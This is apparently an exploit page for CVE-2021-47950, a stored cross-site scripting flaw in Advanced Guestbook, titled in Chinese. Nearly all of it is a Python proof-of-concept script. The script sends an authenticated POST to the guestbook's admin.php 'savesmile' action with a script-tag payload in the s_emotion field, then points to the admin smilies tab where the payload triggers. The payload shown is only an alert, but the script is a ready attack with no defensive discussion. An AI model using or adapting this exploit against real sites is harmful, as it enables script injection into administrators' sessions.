CVE-2021-47950 Advanced Guestbook 存储型XSS漏洞

# Proof of Concept for CVE-2021-47950 import requests # Target URL target = "http://example.com/guestbook/admin.php" # Attacker's session cookie (required as PR:L) cookies = { "PHPSESSID": "attacker_session_id" } # Vulnerable parameter 's_emotion' containing XSS payload # The payload attempts to inject a script tag payload_data = { "action": "savesmile", "s_emotion": '"><script>alert("XSS");</script>', "s_code": ":xss:", "s_filename": "smile.gif" } try: # Send POST request to inject the payload response = requests.post(target, data=payload_data, cookies=cookies) if response.status_code == 200: print("Payload injected successfully.") print("Check the admin smilies tab to trigger the XSS.") else: print(f"Failed to inject payload. Status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")